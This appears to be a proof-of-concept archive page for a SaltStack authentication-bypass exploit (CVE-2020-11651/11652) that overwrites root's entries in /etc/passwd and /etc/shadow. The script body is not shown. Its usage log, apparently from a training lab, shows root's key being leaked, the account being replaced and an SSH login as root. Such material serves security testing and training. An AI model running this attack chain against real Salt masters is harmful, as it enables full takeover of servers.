
CVE-2020-11651 PoC — SaltStack Salt Security Vulnerability

Source
Associated Vulnerability
Title: SaltStack Salt Security Vulnerability (CVE-2020-11651)
Description: An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
Description
A script that exploits SaltStack CVE-2020-11651 and CVE-2020-11652 to add new users to a vulnerable Salt master by injecting entries into /etc/passwd and /etc/shadow.
Readme
# CVE-2020-11651
A script that exploits SaltStack CVE-2020-11651 and CVE-2020-11652 to add new users to a vulnerable Salt master by injecting entries into /etc/passwd and /etc/shadow.

```python
# Exploit Title: Saltstack 3000.1 - Remote Code Execution
# Date: 2020-05-04
# Original Exploit Author: Jasper Lievisse Adriaanse
# Modified Author: Drew Alleman
# Vendor Homepage: https://www.saltstack.com/
# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*
# Tested on: Debian 10 with Salt 2019.2.0
# CVE : CVE-2020-11651 and CVE-2020-11652
# Description: Saltstack authentication bypass/remote code execution
#
# Original Source: https://github.com/jasperla/CVE-2020-11651-poc
# Modified Source: https://github.com/Drew-Alleman/CVE-2020-11651
# This exploit is based on this checker script:
# https://github.com/rossengeorgiev/salt-security-backports
```

## Usage
```
$ python3 CVE-2020-11651-11652-add_user.py -m 192.168.158.62 --replace-root -d
[DEBUG] Auth Info Response: ['user', 'UserAuthenticationError', {'root': 'MpZiP+J3yTzjOQ+ILgZ7KN+os/Jadne3sLha7b7kNz2jLBxBC9hDlajSCObG/ZASPF1RfAr9Lrs='}, []]
[DEBUG] Connected to 192.168.158.62:4506
[DEBUG] Removing existing root line from /etc/passwd
[DEBUG] Removing existing root line from /etc/shadow
[DEBUG] Written to /etc/passwd
[DEBUG] Written to /etc/shadow
[INFO] User root:cvQ0OQaXOf8aYi0Ox*eKGPAQ created successfully.
┌──(.venv)─(drew㉿whitehat)-[~/OSCP_LIKE/Linux/Twiggy/exploits]
└─$ sshpass -p 'cvQ0OQaXOf8aYi0Ox*eKGPAQ' ssh root@192.168.158.62
Last login: Sun Mar 30 02:23:06 2025 from 192.168.45.180
[root@twiggy ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@twiggy ~]# 
```
File Snapshot

```
[4.0K] /data/pocs/5d2ea6af4396917b00453a73cf3094957cc80bb7
├── [8.0K] CVE-2020-11651-11652-add_user.py
└── [1.8K] README.md

0 directories, 2 files
```